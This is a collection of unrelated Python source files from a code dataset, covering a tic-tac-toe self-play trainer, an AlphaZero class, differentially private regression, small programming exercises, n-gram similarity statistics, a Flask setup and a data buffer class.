{"seq_id":"188874499","text":"import sys\nsys.stdin = open('input.txt')\n\ns = input()\nt = input()\n\n\ndef GCD(a, b):\n    while b:\n        n = a % b\n        a = b\n        b = n\n    return a\n\n\ndef LCM(a, b):\n    return a * b // GCD(a, b)\n\n\nfor i in range(LCM(len(s), len(t))):\n    if s[i % len(s)] != t[i % len(t)]:\n        print(0)\n        break\nelse:\n    print(1)\n","sub_path":"boj/12871무한문자열.py","file_name":"12871무한문자열.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"482519931","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\n'''\nThis module is a small function library that provides functions for other modules to use.\nThe function yanghui(n) prints Yang Hui's (Pascal's) triangle.\n'''\ndef yanghui(n):\n    # Limit the order of the triangle\n    if not str(n).isdecimal() or n<2 or n>25:\n        print('yanghui(n): the argument must be a positive integer no less than 2 and no greater than 25')\n        return False\n    # Use a list of lists to build the triangle\n    x = []\n    for i in range(1,n+1):\n        x.append([1]*i)\n    # Compute the interior values of the triangle\n    for i in range(2,n):\n        for j in range(1,i):\n            x[i][j]=x[i-1][j-1]+x[i-1][j]\n    # Print the triangle\n    for i in range(n):\n        if n<=10:\n            print(' '*(40-4*i),end='')\n        for j in range(i+1):\n            print('%-8d'% x[i][j],end='')\n        print()\n'''End of code'''\n\n'''Standalone test code starts here'''\nif __name__=='__main__':\n    print('Standalone module test output')\n    print('1. Yang Hui triangle of order 10:')\n    yanghui(10)","sub_path":"3.函数与模块/5.编程实践:函数库/yanghui.py","file_name":"yanghui.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"376265713","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 14 13:13:09 2018\n\n@author: msed\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\" Trying to implement Algorithm 1 out of the paper Zhang et al. 
for linear regression\"\"\"\ndef lin_reg(data_x,data_y,epsilon):\n    #input pairs (x,y) and privacy budget epsilon; each line of data_x is supposed to be one input vector\n    #assume both data_x and data_y are numpy arrays\n    (n,d)=data_x.shape\n    print(n,d)\n    #assuming data_x and data_y don't have absolute value greater than 1\n    Delta=2*(1+2*d+d**2)\n    # j = 0 : constant terms (in w) in objective function\n    lambd_0=(data_y**2).sum()+np.random.laplace(scale=Delta/epsilon)\n    # j = 1 : linear terms (in w) in objective function\n    # lambd_1 is a d dimensional array holding all the coefficients for the d monomials in w\n    lambd_1=-2*data_y.dot(data_x)+np.random.laplace(scale=Delta/epsilon,size=d)\n    # j = 2: quadratic terms (in w) in objective function\n    # lambd_2 is a d x d dimensional array holding all the coefficients for the d x d quadratic terms of form w_j*w_l\n    lambd_2=data_x.transpose().dot(data_x)+np.random.laplace(scale=Delta/epsilon,size=(d,d))\n    \n    lambd_2_new=lambd_2+np.transpose(lambd_2)\n    #solve quadratic optimization problem: minimize lambd_0+lambd_1^T*w+1/2w^T*lambd_2_new*w\n    #==> solve lambd_2_new * w = -lambd_1\n    w=np.linalg.solve(lambd_2_new,-lambd_1)\n    return w\n\n\"\"\"small example to show that in case of very big epsilon (noise effectively zero) we get correct linear regression\"\"\"\n\ndata_x=np.array([[1,0.2],[1,0.4],[1,0.6]]) # add a x_0 = 1 coordinate for computing w_0\ndata_y=np.array([0.1,0.5,0.6])\n\nx1=np.linspace(0,1,20)\nw=lin_reg(data_x,data_y,1000)\n\n\ndef lin(w, x):\n    return w[1]*x+w[0]\n\nprint(lin(w,x1))\n\nplt.scatter(data_x[:,1],data_y,color='red')\nplt.plot(x1,lin(w,x1),color='blue',linestyle='--')\nplt.show()","sub_path":"Martin/Linear_Regression(slightly faster).py","file_name":"Linear_Regression(slightly faster).py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"286341693","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, Flatten\nfrom tensorflow.keras.initializers import RandomUniform\nimport monte_carlo as mc \n\n\n'''\n    Functions specific to the game, which is a generalised version of tic tac toe.\n    The size of the grid and the number needed in a row to win can be changed at\n    the top of the script with s and w. \n    \n    Player class: contains the value function, the policy function, and win statistics\n    for those functions.\n    Generation class: contains the best player, the challenging player and the data generated \n    by their games. The play_games method plays the games and returns the\n    player with the most wins.\n    Game class: actually plays out the game between two players, calling all of the game \n    and tree-search functions. Contains data just for that game. \n    \n    \n\n'''\n\n\n\n\n#size of board\ns = 5\n#number to win\nw = 3\n\n\n\ndef soft_max(x):\n    x = np.array(x)\n    x = np.exp(x)\n    x = x/np.sum(x)\n    return x\n\n\ndef make_policy(l=7,board_size=s):\n    '''\n    creates players. 
l is the number of layers.\n\n    '''\n    model = Sequential()\n    model.add(Conv2D(32, kernel_size=2, activation='relu', padding='same' ,\n                     input_shape=(2,board_size,board_size),bias_initializer=RandomUniform(seed=1)))\n    for _ in range(l):\n        model.add(Conv2D(64, kernel_size=2,padding='same' ,activation='relu',bias_initializer=RandomUniform()))\n\n    model.add(Flatten())\n    model.add(Dense(50,activation='relu',bias_initializer=RandomUniform()))\n    model.add(Dense(1, activation='sigmoid',bias_initializer=RandomUniform()))\n    model.compile(optimizer = 'adam', loss='mean_squared_error')\n    return model\n\ndef make_value(l=5,board_size=s):\n    '''\n    creates players. l is the number of layers.\n    '''\n    model = Sequential()\n    model.add(Conv2D(32, kernel_size=2, activation='relu', padding='same' ,\n                     input_shape=(1,board_size,board_size),bias_initializer=RandomUniform()))\n    for _ in range(l):\n        model.add(Conv2D(64, kernel_size=2,padding='same' ,activation='relu'))\n\n    model.add(Flatten())\n    model.add(Dense(50,activation='relu'))\n    model.add(Dense(1, activation='tanh'))\n    model.compile(optimizer = 'adam', loss='mean_squared_error')\n    return model\n\n\n\ndef is_win(board,size=s,win_length=w):\n    b = board\n    for row in range(size):\n        for col in range(size):\n            try:\n                dir1 = np.sum(b[row][col:col+win_length])\n                if dir1 == win_length:\n                    return 1\n                if dir1 == -win_length:\n                    return -1\n            except:\n                pass\n\n            try:\n                dir1 = np.sum(b[row][col-win_length+1:col+1])\n                if dir1 == win_length:\n                    return 1\n                if dir1 == -win_length:\n                    return -1\n            except:\n                pass\n\n            try:\n                dir1 = np.sum(b[:,col][row:row+win_length])\n                if dir1 == win_length:\n                    return 1\n                if dir1 == -win_length:\n                    return -1\n            except:\n                pass\n\n            try:\n                dir1 = np.sum(b[:,col][row-win_length+1:row+1])\n                if dir1 == win_length:\n                    return 1\n                if dir1 == -win_length:\n                    return -1\n            except:\n                pass\n            # the four diagonal directions\n            diags = [(1,1),(-1,-1),(1,-1),(-1,1)]\n            for d in diags:\n                try:\n                    dir1 = 0\n                    for j in range(win_length):\n                        if row + j*d[0]<0 or col +j*d[1]<0:\n                            break\n                        dir1 += b[row+j*d[0],col+j*d[1]]\n                    if dir1 == win_length:\n                        return 1\n                    if dir1 == -win_length:\n                        return -1\n                except:\n                    pass\n    return 0\n\ndef is_terminal(board):\n    if is_draw(board) or is_win(board) != 0:\n        return True \n    return False \n\ndef is_draw(board):\n    if np.sum(board == 0) != 0:\n        return 0\n    return 1\n\ndef make_board(size=s):\n    return np.zeros((size,size))\n\ndef make_move(b,move,turn):\n    board = np.copy(b)\n    if turn == 0:\n        board[move[0],move[1]] = 1\n    else:\n        board[move[0],move[1]] = -1\n    return board \n\n\ndef legal_moves(board,player,size=s):\n    moves = []\n    for i in range(size):\n        for j in range(size):\n            if board[i,j] == 0:\n                moves.append((i,j))\n    if player == 'max':\n        turn = 0\n    else:\n        turn = 1\n    states = [make_move(board,m,turn) for m in moves]\n    return states \n\n\ndef create_value_vec(state):\n    return state.reshape((1,s,s))\n\ndef create_action_vec(s1,s2):\n    vec = np.zeros((2,s,s))\n    vec[0] = s1 \n    vec[1] = s2\n    return vec\n\ndef value(model,state):\n    vec = create_value_vec(state)\n    return model.predict(np.array([vec]))\n\ndef policy(model,s1,s2):\n    vec = create_action_vec(s1,s2)\n    return model.predict(np.array([vec]))\n\n\ndef sigmoid(x):\n    return 1/(1+np.exp(-np.array(x)))\n    \n\nclass Game:\n\n    def __init__(self,player1,player2):\n        self.player1 = player1 \n        self.player2 = player2 \n        self.board = make_board()\n        self.player1_tree = mc.Node(value,policy,player1,self.board,'max',legal_moves,is_terminal,[])\n        self.player2_tree = None \n        self.x_val = np.zeros((s*s,1,s,s))\n        self.y_val = 
np.ones((s*s,1))\n self.count = 1\n self.game_states = [self.board]\n def play_game(self):\n first_move = True\n while True:\n mc.tree_search(self.player1_tree,num_searches=50)\n values = [c.value/c.N for c in self.player1_tree.children]\n print([c.N for c in self.player1_tree.children])\n move = np.argmax(values)\n self.player1_tree = self.player1_tree.children[move]\n self.board = self.player1_tree.state\n self.game_states.append(self.board)\n self.x_val[self.count] = np.copy(create_value_vec(self.board))\n self.count += 1\n print(self.board,'\\n')\n if is_win(self.board):\n for i in range(self.count):\n self.y_val[i] = self.y_val[i]*(.9**(self.count-1-i))\n return 1 \n if is_draw(self.board):\n self.y_val = 0*self.y_val \n return 0\n \n if first_move:\n self.player2_tree = mc.Node(value,policy,self.player2,self.board,'min',legal_moves,is_terminal,[])\n first_move = False \n else:\n if self.player2_tree.children == []:\n print('no children')\n self.player2_tree.add_children()\n \n n = [i for i in range(len(self.player2_tree.children)) if np.array_equal(self.player2_tree.children[i].state,self.board)]\n \n self.player2_tree = self.player2_tree.children[n[0]]\n \n \n mc.tree_search(self.player2_tree,num_searches=50)\n values = [c.value/c.N for c in self.player2_tree.children]\n print([c.N for c in self.player2_tree.children])\n move = np.argmin(values)\n self.player2_tree = self.player2_tree.children[move]\n self.board = self.player2_tree.state\n self.game_states.append(self.board)\n print(self.board,'\\n')\n self.x_val[self.count] = np.copy(create_value_vec(self.board))\n self.count += 1\n if is_win(self.board)==-1:\n self.y_val = -1*self.y_val\n for i in range(self.count):\n self.y_val[i] = self.y_val[i]*(.9**(self.count-1-i))\n return -1\n \n if is_draw(self.board):\n self.y_val = 0*self.y_val \n return 0\n if self.player1_tree.children == []:\n print('no children')\n self.player1_tree.add_children()\n \n n = [i for i in range(len(self.player1_tree.children)) if np.array_equal(self.player1_tree.children[i].state,self.board)]\n \n self.player1_tree = self.player1_tree.children[n[0]]\n \n def clip_data(self):\n self.x_val = self.x_val[:self.count]\n self.y_val = self.y_val[:self.count]\n\n def get_action_data(self):\n x_action = []\n y_action = []\n \n for node in self.player1_tree.node_lst:\n \n if node.parent == None:\n pass \n else:\n curr_node = node\n val = node.value/node.N \n while curr_node.parent != None:\n val_anc = curr_node.parent.value/curr_node.parent.N\n\n if val > val_anc:\n curr_node.action_data += 1\n curr_node = curr_node.parent\n \n for node in self.player1_tree.node_lst:\n \n if node.parent == None:\n pass\n elif node.children == [] and node.terminal == False:\n pass \n elif node.children == [] and node.terminal:\n win = is_win(node.state)\n if win == 1:\n vec = create_action_vec(node.parent.state,node.state)\n y_action.append(1)\n x_action.append(vec)\n if win == -1:\n vec = create_action_vec(node.parent.state,node.state)\n y_action.append(-1)\n x_action.append(vec) \n else:\n vec = create_action_vec(node.parent.state,node.state)\n x_action.append(vec)\n y_action.append(node.action_data/node.N)\n \n \n \n for node in self.player2_tree.node_lst:\n \n if node.parent == None:\n pass \n else:\n curr_node = node\n val = node.value/node.N \n while curr_node.parent != None:\n val_anc = curr_node.parent.value/curr_node.parent.N\n if val > val_anc:\n curr_node.action_data += 1\n curr_node = curr_node.parent\n\n \n for node in self.player2_tree.node_lst:\n if node.parent == 
None:\n                pass\n            elif node.children == [] and node.terminal == False:\n                pass \n            elif node.children == [] and node.terminal:\n                win = is_win(node.state)\n                if win == 1:\n                    vec = create_action_vec(node.parent.state,node.state)\n                    y_action.append(1)\n                    x_action.append(vec)\n                if win == -1:\n                    vec = create_action_vec(node.parent.state,node.state)\n                    y_action.append(-1)\n                    x_action.append(vec) \n            else:\n                vec = create_action_vec(node.parent.state,node.state)\n                x_action.append(vec)\n                y_action.append(node.action_data/node.N)\n        return np.array(x_action),np.array(y_action)\n\nclass Player:\n\n    def __init__(self):\n        self.wins = 0 \n        self.losses = 0\n        self.models = [make_value(),make_policy()] \n    \n    def train(self,vx,vy,ax,ay):\n        self.models[0].fit(vx,vy,epochs=3,validation_split=.1)\n        self.models[1].fit(ax,ay,epochs=10,validation_split = .1)\n\n\nclass Generation:\n\n    def __init__(self,players,num_games=10):\n        self.players = players\n        self.action_data = np.zeros((350000,2,s,s))\n        self.value_data = np.zeros((30000,1,s,s))\n        self.action_tar = np.zeros((350000,1))\n        self.value_tar = np.zeros((30000,1))\n        self.action_count = 0\n        self.value_count = 0\n        self.num_games = num_games \n        self.sample_games = []\n    \n    def play_games(self):\n        for i in range(self.num_games):\n            #np.random.shuffle(self.players)\n            player1 = self.players[0].models\n            player2 = self.players[1].models\n            g = Game(player1,player2)\n            win = g.play_game()\n            if win == 1:\n                self.players[0].wins += 1\n            if win == -1:\n                self.players[1].wins += 1\n            a_x,a_y = g.get_action_data()\n            g.clip_data()\n            v_x,v_y = g.x_val,g.y_val\n            n = len(v_x)\n            m = len(a_x)\n            v_y = v_y.reshape(n,1)\n            a_y = a_y.reshape(m,1)\n            self.action_data[self.action_count:self.action_count+m] = a_x \n            self.action_tar[self.action_count:self.action_count+m] = a_y\n            self.value_data[self.value_count:self.value_count+n] = v_x \n            self.value_tar[self.value_count:self.value_count+n] = v_y \n            self.action_count += m \n            self.value_count += n\n            self.sample_games.append(g.game_states) \n            print('Game {} Done {} {}'.format(i,n,m))\n        for i in range(self.num_games):\n            #np.random.shuffle(self.players)\n            player1 = self.players[1].models\n            player2 = self.players[0].models\n            g = Game(player1,player2)\n            win = g.play_game()\n            if win == 1:\n                self.players[1].wins += 1\n            if win == -1:\n                self.players[0].wins += 1\n            a_x,a_y = g.get_action_data()\n            g.clip_data()\n            v_x,v_y = g.x_val,g.y_val\n            n = len(v_x)\n            m = len(a_x)\n            v_y = v_y.reshape(n,1)\n            a_y = a_y.reshape(m,1)\n            self.action_data[self.action_count:self.action_count+m] = a_x \n            self.action_tar[self.action_count:self.action_count+m] = a_y\n            self.value_data[self.value_count:self.value_count+n] = v_x \n            self.value_tar[self.value_count:self.value_count+n] = v_y \n            self.action_count += m \n            self.value_count += n\n            self.sample_games.append(g.game_states) \n            print('Game {} Done {} {}'.format(i,n,m))\n        if self.players[0].wins >= self.players[1].wins:\n            return self.players[0] \n        else:\n            print('best player change')\n            return self.players[1]\n\n\n    def clip_data(self):\n        '''\n        Space is pre-allocated, so this removes \n        unused rows.\n        '''\n        self.value_data = self.value_data[:self.value_count]\n        self.action_data = self.action_data[:self.action_count]\n        self.value_tar = self.value_tar[:self.value_count]\n        self.action_tar = self.action_tar[:self.action_count]\n    \n    \n\ndef augment_v(vx,vy):\n    '''\n    The game is rotationally invariant, so we exploit this to\n    increase the training data.\n    \n    '''\n    n = vx.shape[0]\n    A = np.zeros((4*vx.shape[0],1,s,s))\n    Ay = np.zeros((4*vx.shape[0],1))\n    for i in 
range(n):\n vec = vx[i][0]\n tar = vy[i][0]\n vec1 = np.rot90(vec, k=1)\n vec2 = np.rot90(vec, k=2)\n vec3 = np.rot90(vec, k=3)\n A[4*i] = vec.reshape(1,s,s) \n A[4*i+1] = vec1.reshape(1,s,s)\n A[4*i+2] = vec2.reshape(1,s,s)\n A[4*i+3] = vec3.reshape(1,s,s)\n Ay[4*i] = tar \n Ay[4*i+1] = tar\n Ay[4*i+2] = tar \n Ay[4*i+3] = tar \n return A,Ay \n\n\n\n\n\n\ndef play_random(player1):\n '''\n It can be hard to tell the difference\n between improvement and randomness so\n a player can be made to play against\n random moves as a basic objective \n measure.\n '''\n board = make_board()\n player1_tree = mc.Node(value,policy,player1,board,'max',legal_moves,is_terminal,[])\n while True:\n mc.tree_search(player1_tree,num_searches=35)\n values = [c.value/c.N for c in player1_tree.children]\n move = np.argmax(values)\n player1_tree = player1_tree.children[move]\n board = player1_tree.state\n print('')\n print(board)\n print('')\n if is_win(board):\n print('ai win')\n break\n if is_draw(board):\n print('draw')\n break\n\n \n moves = legal_moves(board,'min')\n np.random.shuffle(moves)\n board = moves[0]\n print(board)\n if is_win(board)==-1:\n print('random wins')\n break \n if is_draw(board):\n print('draw')\n break\n \n n = [i for i in range(len(player1_tree.children)) if np.array_equal(player1_tree.children[i].state,board)]\n \n print(len(player1_tree.children))\n player1_tree = player1_tree.children[n[0]]\n\n\n\n","sub_path":"tictac.py","file_name":"tictac.py","file_ext":"py","file_size_in_byte":16933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"477069931","text":"import numpy as np\nfrom abstract_model import AbstractModel\nfrom nnet import NNet\n\nclass AlphaZero(AbstractModel):\n def __init__(self, state_encoder, exploration_rate, number_of_mcts_simulations):\n super().__init__(state_encoder)\n self.exploration_rate = exploration_rate\n self.number_of_mcts_simulations = number_of_mcts_simulations\n self.visited_states = set()\n self.examples = []\n self.P = {} #P[s][a] = policy value for move a in state s\n self.Q = {} #Q[s][a] = q-value of taking action a from state s\n self.N = {} #N[s][a] = number of times algorithm played action a from state s\n self.is_learning = False\n self.net = NNet(self.input_nodes, self.output_nodes)\n\n def simulate_game(self, env,depth=0):\n s = self.state_encoder.state_to_vector(env.return_state(False))\n if s not in self.visited_states:\n self.Q[s] = [0]*self.output_nodes\n self.N[s] = [0]*self.output_nodes\n \n if env.end or depth >= 200:\n return self.get_score_at_end_pos(env.current_player, env.winner)\n\n \n if s not in self.visited_states:\n self.visited_states.add(s)\n prediction = self.net.predict(s)\n self.P[s] = prediction[0][0]\n v = prediction[1][0][0]\n print(v)\n return v\n \n best_action = (-float(\"inf\"), -1)\n\n for action, avail in enumerate(self.state_encoder.available_outputs(env)):\n if avail:\n upper_confidence_bound = self.Q[s][action] + self.exploration_rate * self.P[s][action]*(sum(self.N[s])**0.5)/(1+self.N[s][action])\n best_action = max(best_action, (upper_confidence_bound, action))\n \n action = best_action[1]\n cur_player = env.current_player\n #print(\"moving\", self.output_to_move(action, env.return_state()))\n env.move(self.state_encoder.output_to_move(action, env.return_state()))\n player_after_move = env.current_player\n v = self.simulate_game(env,depth+1)\n if cur_player != player_after_move:\n v *= -1\n \n \n self.Q[s][action] = (self.N[s][action]*self.Q[s][action] + 
v)/(self.N[s][action]+1)\n        self.N[s][action] += 1\n        return v\n\n    def get_pi(self, state):\n        ns = np.array(self.N[state])\n        if sum(ns) == 0:\n            ns = np.ones(self.output_nodes)\n        return ns/sum(ns)\n\n\n    def get_scores_for_each_move(self,env):\n        for _ in range(self.number_of_mcts_simulations):\n            ecp = env.copy()\n            result = self.simulate_game(ecp,0)\n            #print('game_result = ',result)\n        \n        s = self.state_encoder.state_to_vector(env.return_state(False))\n        pi = self.get_pi(s)\n        if self.is_learning:\n            self.examples.append((s, pi.copy(),None))\n        return pi\n\n    def get_best_move(self,env):\n        state = env.return_state()\n        aval_vector = self.state_encoder.available_outputs(env)\n        raw_prediction = self.get_scores_for_each_move(env)\n        prediction = raw_prediction * aval_vector\n        assert sum(prediction) > 0\n        prediction /= sum(prediction)\n        #for i in range(len(prediction)):\n        #    assert prediction[i] == raw_prediction[i]\n        return self.state_encoder.output_to_move(np.random.choice(len(prediction), p=prediction),state)\n\n\n    def update_model_after_game(self,env):\n        if self.is_learning:\n            # fill in the placeholder targets with the actual end-of-game score for the player to move\n            self.examples = [(ex[0],ex[1], ex[2] if ex[2] is not None else self.get_score_at_end_pos(ex[0][0],env.winner)) for ex in self.examples]\n\n    def produce_new_version(self):\n        new_net = NNet(self.input_nodes, self.output_nodes)\n        new_net.train(self.examples)\n\n        az = AlphaZero(self.state_encoder, self.exploration_rate, self.number_of_mcts_simulations)\n        az.net = new_net\n        return az\n\n    def get_score_at_end_pos(self,current_player, winner):\n        if current_player == winner:\n            return 1\n        elif current_player == 1-winner:\n            return -1\n        return 0","sub_path":"splendor_ai/alpha_zero.py","file_name":"alpha_zero.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"114096620","text":"#CivObj Class & associated methods\r\n#Civ object is a localized entity with x & y positions, plus a radius\r\n\r\nimport random\r\nrandom.seed()\r\nimport WorldActor\r\n\r\nclass CivObj(WorldActor.WorldActor):\r\n    r = None\r\n    \r\n    def __init__(self, xpos, ypos, radius):\r\n        self.x = xpos\r\n        self.y = ypos\r\n        self.r = radius\r\n        \r\ndef GenRandCiv(minr, maxr):\r\n    newCivObj = CivObj(random.randint(0,100), random.randint(0,100), random.randint(minr,maxr))\r\n    return newCivObj","sub_path":"adventure-mode/src/CivObj.py","file_name":"CivObj.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"128067305","text":"from scipy import stats\nfrom scipy.stats import ks_2samp\nimport numpy as np\nimport scipy as sp\nimport math\nimport matplotlib.pyplot as plt\nimport xml.etree.cElementTree as ET\nimport xml.etree.ElementTree as etree\nimport os\nimport string\nfrom string import ascii_letters\nimport io\nimport re\nimport csv\nimport codecs\nimport datetime\nimport json, time, sys\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nimport wordsegment\nfrom wordsegment import load, segment\nimport splitter\nimport enchant\nimport nltk, pprint\nfrom nltk import word_tokenize\n#from wordsegmentation import WordSegment\nfrom nltk import ngrams\nfrom nltk.corpus import stopwords\n\n\n\ndef jaccard(a,b):\n    #a=a.split()\n    #b=a.split()\n    union = 
list(set(a+b))\n    intersection = list(set(a) - (set(a)-set(b)))\n    #print(\"Union - %s\" % union)\n    #print(\"Intersection - %s\" % intersection)\n    jaccard_coeff = float(len(intersection))/len(union)\n    print(\"Jaccard Coefficient is = %f \" % jaccard_coeff)\n\n\n\n\n\ndef process_text(text): \n    text = text.lower()\n    text = text.replace('(', '')\n    text = text.replace(',', '')\n    text = text.replace(\"'\", '')\n    # Convert text string to a list of words\n    return text.split()\n\n\nwikidatalist=[]\n\n\ndef getWikidataList():\n    #with open('./wikidataprocessed/order20190613-130019.csv', 'r') as f:\n    with open('./SimplifiedList.csv', 'r') as f:\n        print('##### TRY ######')\n        read = csv.reader(f) \n        next(read)\n        for line in read:\n            lineitem = line[0].split()[0]\n            item1 = process_text(lineitem)\n            #print(item1[0])\n            wikidatalist.append(item1[0])\n    return wikidatalist\n\n\ndef getTwitterList(n):\n    '''Read the ngram counts for the given n and return them as a fresh list.'''\n    twitterdatalist = []\n    with open('./orderedresultsngram{}/count.csv'.format(n), 'r') as f:\n        print('##### TRY ######')\n        read = csv.reader(f) \n        next(read)\n        for line in read:\n            lineitem = line[0].split()[0]\n            item1 = process_text(lineitem)\n            twitterdatalist.append(item1[0])\n    return twitterdatalist\n\n\n#print(getWikidataList())\n#print(getTwitterList(1))\n\nwikidatalist = getWikidataList()\ntwitterData1 = getTwitterList(1)\ntwitterData2 = getTwitterList(2)\ntwitterData3 = getTwitterList(3)\ntwitterData4 = getTwitterList(4)\n\n#########################\n#STATS 1 \n########################\nprint('NGRAMS 1')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData1)\nprint(ks_statistic)\nprint(p_value)\n\nprint('NGRAMS 2')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData2)\nprint(ks_statistic)\nprint(p_value)\n\n\nprint('NGRAMS 3')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData3)\nprint(ks_statistic)\nprint(p_value)\n\n\nprint('NGRAMS 4')\nks_statistic, p_value = ks_2samp(wikidatalist, twitterData4)\nprint(ks_statistic)\nprint(p_value)\n\n\n\n#########################\n# STATS 
2\n########################\n\ndef jaccard_similarity(list1, list2):\n    intersection = len(list(set(list1).intersection(list2)))\n    #print(list(set(list1).intersection(list2)))\n    union = (len(list1) + len(list2)) - intersection\n    return float(intersection / union)\n\nprint('NGRAMS 1')\nsimilarity1 = jaccard_similarity(wikidatalist, twitterData1)\ndistance1 = (1 - similarity1)\nprint('JJ similarity')\nprint(similarity1)\nprint('JJ distance')\nprint(distance1)\n\njaccard(wikidatalist, twitterData1)\n\nprint('NGRAMS 2')\nsimilarity2 = jaccard_similarity(wikidatalist, twitterData2)\ndistance2 = (1 - similarity2)\nprint('JJ similarity')\nprint(similarity2)\nprint('JJ distance')\nprint(distance2)\n\njaccard(wikidatalist, twitterData2)\n\nprint('NGRAMS 3')\nsimilarity3 = jaccard_similarity(wikidatalist, twitterData3)\ndistance3 = (1 - similarity3)\nprint('JJ similarity')\nprint(similarity3)\nprint('JJ distance')\nprint(distance3)\n\njaccard(wikidatalist, twitterData3)\n\nprint('NGRAMS 4')\nsimilarity4 = jaccard_similarity(wikidatalist, twitterData4)\ndistance4 = (1 - similarity4)\nprint('JJ similarity')\nprint(similarity4)\nprint('JJ distance')\nprint(distance4)\n\njaccard(wikidatalist, twitterData4)\n\n","sub_path":"twitterwikidataprocessing/graphs/50/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"275828340","text":"# 2. Prime factorization: read a positive integer and print its prime factorization:\n# e.g.:\n# Input: 90\n# Print:\n# 90=2*3*3*5\n# (A prime factor is a prime that divides the original number; 1 is excluded.)\n\ndef is_prime(x):\n    '''Return True if x is prime'''\n    if x <= 1:\n        return False\n    for i in range(2, x):\n        if x % i == 0:\n            return False\n    return True\n\ndef get_prime_list(n):\n    '''Given an integer, return the list of all its prime factors'''\n    # Work out all the prime factors of n\n    L = []  # holds all the (prime) factors\n    # As long as n is not prime, split a factor off\n    while not is_prime(n):\n        # Split one prime factor off n, then continue the loop\n        # Find a factor of n:\n        for x in range(2, n):\n            if is_prime(x) and n % x == 0:\n                # x must be a factor of n\n                L.append(x)\n                n /= x  # then factor the remaining n on the next pass\n                n = int(n)  # convert back to an integer\n                break\n    else:\n        L.append(n)\n    return L\n\nif __name__ == '__main__':\n    n = int(input(\"Enter an integer: \"))\n    print(get_prime_list(n)) \n\n\n\n","sub_path":"第一阶段/4. Python03/day04/day03_exercise/02_zhiyinshu.py","file_name":"02_zhiyinshu.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"321608987","text":"from flask import Flask, Blueprint\nfrom flask_socketio import SocketIO\nfrom redis import Redis\n# from . 
import app_controller\n\n\nmain = Blueprint('main', __name__)\napp = Flask(__name__,\n             template_folder='../templates',\n             static_folder='../static')\n# app.debug = debug\napp.register_blueprint(main)\nsocketio = SocketIO(app, async_mode=None)\nredis = Redis(host='redis', port=6379)\n#socketio.init_app(app)","sub_path":"src/app/py/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"33141327","text":"from itertools import combinations\nN,P,Q = map(int,input().split())\nA = list(map(int,input().split()))\nans = 0\n\n# for i in range(N):\n#     for j in range(i+1,N):\n#         for k in range(j+1,N):\n#             for l in range(k+1,N):\n#                 for m in range(l+1,N):\n#                     if A[i]*A[j]%P*A[k]%P*A[l]%P*A[m]%P == Q:\n#                         ans += 1\n\nfor c in combinations(A,5):\n    if c[0]*c[1]%P*c[2]%P*c[3]%P*c[4]%P == Q:\n        ans += 1\n\nprint(ans)\n","sub_path":"tenkei90/055.py","file_name":"055.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"542943492","text":"from threading import Lock\nfrom component.ComponentBaseClass import ComponentBaseClass\n\n\nclass Buffer(ComponentBaseClass):\n    def __init__(self, config):\n        super().__init__(config)\n        self.maxsize = config['maxsize']\n        self.maxpolicy = config['maxpolicy']\n        self.error = None\n        self.info = None\n        self.bufferempty = True\n        self.bufferready = False\n        self.bufferLock = Lock()\n        self.buffer = {\n            'metadata': {\n                'deviceID': \"\"\n            },\n            'data': {\n            }\n        }\n        if 'database' in config:\n            self.database = config['database']\n        if config['type'] == 'local':\n            self.typechoice = 0\n        elif config['type'] == 'remote':\n            self.typechoice = 1\n        self.procedurecall = [self.localBuffer, self.remoteBuffer]\n\n    def fillBuffer(self, data):\n        self.procedurecall[self.typechoice](data)\n\n    def process(self, data):\n        try:\n            if not self.bufferready:\n                return None\n            else:\n                with self.bufferLock:\n                    self.bufferempty = True\n                    return self.buffer\n        except Exception as error:\n            self.error = str(self.__class__) + \": \" + str(error)\n            self.logger.exception(\"ERROR\")\n\n    def localBuffer(self, data):\n        with self.bufferLock:\n            #if not self.buffer['meta']['deviceID']:\n            if data['metadata']['deviceID']:\n                self.buffer['metadata']['deviceID'] = data['metadata']['deviceID']\n            if self.bufferempty:\n                self.bufferempty = False\n                self.buffer['data'] = {}\n                for sensor in data['data']:\n                    self.buffer['data'][sensor] = []\n                    for valueset in data['data'][sensor]:\n                        self.buffer['data'][sensor].append(valueset)\n            else:\n                for sensor in data['data']:\n                    if sensor not in self.buffer['data'].keys():\n                        self.buffer['data'][sensor] = []\n                    for valueset in data['data'][sensor]:\n                        self.buffer['data'][sensor].append(valueset)\n            self.bufferready = True\n\n    def remoteBuffer(self, data):\n        # to be implemented in next iteration\n        pass\n","sub_path":"src/component/Buffer.py","file_name":"Buffer.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
